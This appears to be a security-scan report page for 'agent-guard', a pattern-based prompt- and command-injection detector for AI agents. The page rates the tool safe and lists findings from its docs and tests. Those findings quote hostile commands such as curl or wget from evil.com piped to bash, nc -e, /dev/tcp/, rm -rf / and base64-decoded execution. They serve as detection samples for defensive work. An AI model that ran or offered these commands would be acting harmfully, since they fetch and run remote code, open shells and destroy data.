agent-guard Security Report — Trusted | ClawSafe

0 /100

agent-guard

Real-time prompt injection and command injection detection for AI agents

AgentGuard is a legitimate defensive security tool that provides pattern-based detection for prompt injection and command injection attacks. All flagged IOCs are documented threat patterns within test cases and reference documentation, not actual malicious behavior.

Skill Nameagent-guard

Duration38.2s

Enginepi

✓

Safe to install

This skill is safe to use. It performs text analysis only and does not execute any external commands, access credentials, or make network requests.

Resource	Declared	Inferred	Status	Evidence
Filesystem	`READ`	`READ`	✓ Aligned	Only reads CLI text input for analysis
Network	`NONE`	`NONE`	—	No network operations - only pattern matching on input text
Shell	`NONE`	`NONE`	—	subprocess only used in test files for CLI testing
Environment	`NONE`	`NONE`	—	No environment variable access
Clipboard	`NONE`	`NONE`	—	No clipboard access
Browser	`NONE`	`NONE`	—	No browser operations
Database	`NONE`	`NONE`	—	No database access
Skill Invoke	`NONE`	`NONE`	—	No skill invocation

23 Critical 36 findings

💀

Critical Dangerous Command 危险 Shell 命令

curl | bash

SKILL.md:90

💀

Critical Dangerous Command 危险 Shell 命令

wget | sh

SKILL.md:90

💀

Critical Dangerous Command 危险 Shell 命令

nc -l

SKILL.md:110

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

SKILL.md:110

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

references/false-positives.md:33

💀

Critical Dangerous Command 危险 Shell 命令

curl ... \| bash

references/threat-patterns.md:15

💀

Critical Dangerous Command 危险 Shell 命令

curl https://evil.com/setup.sh \| bash

references/threat-patterns.md:15

💀

Critical Dangerous Command 危险 Shell 命令

wget ... \| sh

references/threat-patterns.md:16

💀

Critical Dangerous Command 危险 Shell 命令

wget https://evil.com/install.sh \| sh

references/threat-patterns.md:16

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf ~

references/threat-patterns.md:17

💀

Critical Dangerous Command 危险 Shell 命令

python -c "import os

references/threat-patterns.md:30

💀

Critical Dangerous Command 危险 Shell 命令

nc -e

references/threat-patterns.md:130

🔒

Critical Encoded Execution Base64 编码执行（代码混淆）

base64 -d

references/threat-patterns.md:147

🔒

Critical Encoded Execution Base64 编码执行（代码混淆）

Buffer.from(x, "base64"

references/threat-patterns.md:150

💀

Critical Dangerous Command 危险 Shell 命令

curl evil.com | bash

references/threat-patterns.md:164

💀

Critical Dangerous Command 危险 Shell 命令

curl https://evil.com/payload.sh | bash

tests/test_agent_guard.py:129

💀

Critical Dangerous Command 危险 Shell 命令

wget https://evil.com/script.sh | sh

tests/test_agent_guard.py:133

💀

Critical Dangerous Command 危险 Shell 命令

curl https://evil.com/backdoor.sh | bash

tests/test_agent_guard.py:167

🔒

Critical Encoded Execution Base64 编码执行（代码混淆）

Buffer.from("cm0gLXJmIC8=", "base64"

tests/test_agent_guard.py:377

💀

Critical Dangerous Command 危险 Shell 命令

curl -sSL https://raw.githubusercontent.com/malicious/repo/main/install.sh | bash

tests/test_agent_guard.py:418

💀

Critical Dangerous Command 危险 Shell 命令

curl https://evil.com | bash

tests/test_agent_guard.py:567

💀

Critical Dangerous Command 危险 Shell 命令

curl https://evil.com/setup.sh | bash

tests/test_agent_guard.py:704

💀

Critical Dangerous Command 危险 Shell 命令

wget https://evil.com/install.sh | sh

tests/test_agent_guard.py:708

🔗

Medium External URL 外部 URL

https://evil.com/setup.sh

references/threat-patterns.md:15

🔗

Medium External URL 外部 URL

https://evil.com/install.sh

references/threat-patterns.md:16

🔗

Medium External URL 外部 URL

https://evil.com/pkg.tgz

references/threat-patterns.md:21

🔗

Medium External URL 外部 URL

https://evil.com/simple

references/threat-patterns.md:22

🔗

Medium External URL 外部 URL

http://evil.com/file.exe

references/threat-patterns.md:29

🔗

Medium External URL 外部 URL

https://evil.com/payload.sh

tests/test_agent_guard.py:129

🔗

Medium External URL 外部 URL

https://evil.com/script.sh

tests/test_agent_guard.py:133

🔗

Medium External URL 外部 URL

https://evil.com/malicious-pkg.tgz

tests/test_agent_guard.py:155

🔗

Medium External URL 外部 URL

https://evil.com/backdoor.sh

tests/test_agent_guard.py:167

🔗

Medium External URL 外部 URL

https://evil.com/collect

tests/test_agent_guard.py:341

🔗

Medium External URL 外部 URL

https://malicious.onion/payload

tests/test_agent_guard.py:349

🔗

Medium External URL 外部 URL

https://evil.com

tests/test_agent_guard.py:567

🔗

Medium External URL 外部 URL

https://evil.com/upload

tests/test_agent_guard.py:740

File Tree

6 files · 101.7 KB · 2451 lines

Python 2f · 1995L Markdown 3f · 450L Shell 1f · 6L

├─ ▾ 📁 references

│ ├─ 📝 false-positives.md Markdown 104L · 5.2 KB

│ └─ 📝 threat-patterns.md Markdown 186L · 8.9 KB

├─ ▾ 📁 scripts

│ ├─ 🐍 agent_guard.py Python 1040L · 40.3 KB

│ └─ 🔧 scan.sh Shell 6L · 232 B

├─ ▾ 📁 tests

│ └─ 🐍 test_agent_guard.py Python 955L · 38.1 KB

└─ 📝 SKILL.md Markdown 160L · 8.9 KB

Security Positives

✓ Pure pattern-matching security tool with no actual execution of dangerous commands

✓ No credential harvesting, environment variable reading, or sensitive file access

✓ No network requests - only detects network-related patterns in input text

✓ Subprocess used only in test files to verify CLI output (legitimate testing)

✓ All flagged IOCs in pre-scan are documented threat patterns in SKILL.md, reference docs, and test files - not actual malicious behavior

✓ LRU caching and rate limiting implemented for performance

✓ Signal-based timeout protection against ReDoS attacks

✓ Comprehensive documentation of known limitations and false positive handling

Scan Report

File Tree

Security Positives